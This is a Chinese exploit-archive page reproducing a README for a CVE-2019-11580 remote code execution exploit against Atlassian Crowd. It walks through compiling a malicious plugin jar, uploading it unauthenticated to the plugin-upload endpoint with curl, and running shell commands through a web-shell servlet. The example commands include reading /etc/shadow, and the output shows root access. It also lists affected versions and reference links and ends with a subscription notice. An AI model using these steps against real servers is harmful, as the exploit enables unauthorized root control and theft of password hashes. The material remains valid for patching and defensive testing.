关联漏洞
Description
CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE
介绍
# CVE-2019-11580
## Atlassian Crowd and Crowd Data Center RCE
## Usage:
`python CVE-2019-11580.py http://xx.xx.xx.xx/`

#### Crowd-2.11.0 Vuln_Version Donwload
`https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-2.11.0.tar.gz`
` Powered by Atlassian Crowd Version: 2.11.0 (Build:#725 - 2017-01-11)`

`http://10.10.20.166:8095/crowd/admin/uploadplugin.action`

`http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow`

### 0x01 compile for rce.jar
`javac -cp servlet-api.jar com/cdl/shell/exp.java`
`zip -r rce.jar atlassian-plugin.xml ./com`
```
./compile.sh
updating: atlassian-plugin.xml (deflated 54%)
updating: com/ (stored 0%)
updating: com/cdl/ (stored 0%)
updating: com/cdl/shell/ (stored 0%)
updating: com/cdl/shell/exp.java (deflated 59%)
updating: com/cdl/shell/exp.class (deflated 45%)
```
### 0x02 upload rce.jar to crowd/admin/uploadplugin.action
```
curl -k -H "Content-Type: multipart/mixed" \
--form "file_cdl=@rce.jar" http://10.10.20.166:8095/crowd/admin/uploadplugin.action
Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-1059463178748466378rce.jar
```
### 0x03 get shell
```
curl "http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=whoami"
>>> root
curl "http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=id"
>>> uid=0(root) gid=0(root) groups=0(root)
```
##### 自定义cmd值:
```
https://github.com/lc/research/blob/master/CVE-2019-11580/atlassian-shell/com/cdl/shell/Cdl.java
思路参考: https://www.t00ls.net/articles-51978.html
原代码String cmd="whoami";
修改为String cmd=String.valueOf(req.getParameter("cmd"));
```
### vuln version
```
Affected Versions
Fixed Version
2.1.0, 2.1.1, 2.1.2, 2.2.0, 2.2.1, 2.2.2, 2.2.3, 2.2.4, 2.2.5, 2.2.6, 2.2.7, 2.2.8, 2.2.9, 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.4.4, 2.4.5, 2.4.6, 2.4.7, 2.4.8, 2.4.9, 2.4.10, 2.4.11, 2.5.0, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 2.6.7, 2.7.0, 2.7.1, 2.7.2, 2.8.0, 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.6, 2.8.7, 2.8.8, 2.9.1, 2.9.2, 2.9.3, 2.9.4, 2.9.5, 2.9.6, 2.9.7, 2.10.1, 2.10.2, 2.10.3, 2.10.4, 2.11.0, 2.11.1, 2.11.2, 2.12.0, 2.12.1, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4
3.0.5
3.1.0, 3.1.1, 3.1.2, 3.1.3, 3.1.4, 3.1.5
3.1.6
3.2.0, 3.2.1, 3.2.2, 3.2.3, 3.2.4, 3.2.5, 3.2.6, 3.2.7
3.2.8
3.3.0, 3.3.1, 3.3.2, 3.3.3, 3.3.4
3.3.5
3.4.0, 3.4.1, 3.4.2, 3.4.3
3.4.4
```
### 参考链接
```
https://www.t00ls.net/articles-51978.html
https://www.corben.io/atlassian-crowd-rce/
https://github.com/lc/research/tree/master/CVE-2019-11580/atlassian-shell
```
文件快照
[4.0K] /data/pocs/db541bda6c138270b8c16528b32cfd26486ddbfc
├── [4.0K] atlassian-shell
│ ├── [ 516] atlassian-plugin.xml
│ ├── [4.0K] com
│ │ └── [4.0K] cdl
│ │ └── [4.0K] shell
│ │ └── [ 909] exp.java
│ ├── [ 91] compile.sh
│ ├── [5.4K] rce.jar
│ └── [238K] servlet-api.jar
├── [175K] crowd.jpg
├── [175K] CVE-2019-11580.jpg
├── [ 13K] CVE-2019-11580.py
├── [446K] getshell_success.jpg
├── [2.7K] README.md
└── [121K] uploadplugin.jpg
4 directories, 11 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →